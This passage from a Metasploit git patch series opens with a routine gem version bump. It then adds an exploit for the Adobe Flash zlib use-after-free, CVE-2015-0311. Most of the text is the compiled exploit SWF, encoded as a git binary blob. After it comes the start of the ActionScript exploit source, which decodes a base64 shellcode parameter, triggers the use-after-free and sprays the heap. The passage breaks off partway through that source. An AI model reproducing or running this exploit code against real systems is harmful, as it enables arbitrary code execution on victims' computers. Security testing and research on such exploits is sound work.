From 4ca8611d946afbec0d4a9fd23a1f0511e8889bde Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 9 Mar 2015 11:31:02 -0500 Subject: [PATCH 01/18] latest credential for postgres hash import/export latest version of metasploit-credential updates credential import-export to support the PostgresMD5 hash type MSP-12266 --- metasploit-framework-db.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 1ce2b27901..7ffe9857f6 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec @@ -29,7 +29,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', *Metasploit::Framework::RailsVersionConstraint::RAILS_VERSION # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.2' + spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.3' # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.0' # depend on metasploit-framewrok as the optional gems are useless with the actual code From cb72b2687429ec10cfd75435fd442bb866f0ef4e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:52:23 -0500 Subject: [PATCH 02/18] Add module for CVE-2014-0311 --- data/exploits/CVE-2015-0311/msf.swf | Bin 0 -> 17656 bytes .../source/exploits/CVE-2015-0311/Main.as | 243 ++++++++++++++++++ .../adobe_flash_uncompress_zlib_uaf.rb | 107 ++++++++ 3 files changed, 350 insertions(+) create mode 100755 data/exploits/CVE-2015-0311/msf.swf create mode 100755 external/source/exploits/CVE-2015-0311/Main.as create mode 100644 modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..badd95d11b488e604312bfdf0db008722571bc58 GIT binary patch literal 17656 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/framework/libs) to the AIRSDK folder (/framework/libs) +// 5. Build with: mxmlc -o msf.swf Main.as + +// Original code by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/ +// Modified to be used from msf +package +{ + import flash.display.Sprite; + import flash.display.LoaderInfo; + import flash.system.ApplicationDomain; + import flash.utils.ByteArray; + import avm2.intrinsics.memory.casi32; + import flash.external.ExternalInterface; + import mx.utils.Base64Decoder; + + public class Main extends Sprite + { + private var data:uint = 0xdeaddead + private var uv:Vector. = new Vector. + private var ba:ByteArray = new ByteArray() + private var spray:Vector. = new Vector.(51200) + private var b64:Base64Decoder = new Base64Decoder(); + private var payload:String = ""; + + /*public static function log(msg:String):void{ + var str:String = ""; + str += msg; + + trace(str); + + if(ExternalInterface.available){ + ExternalInterface.call("alert", str); + } + }*/ + + public function Main() + { + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + payload = b64.toByteArray().toString(); + + for (var i:uint = 0; i < 1000; i++) ba.writeUnsignedInt(data++) + ba.compress() + ApplicationDomain.currentDomain.domainMemory = ba + ba.position = 0x200 + for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00) + try { + ba.uncompress() + } catch (e:Error) { } + uv[0] = new Vector.(0x3E0) + casi32(0, 0x3e0, 0xffffffff) + + for (i = 0; i < spray.length; i++) { + spray[i] = new Vector.(1014) + spray[i][0] = ba + spray[i][1] = this + } + + /* + 0:008> dd 5ca4000 + length vtable? data + 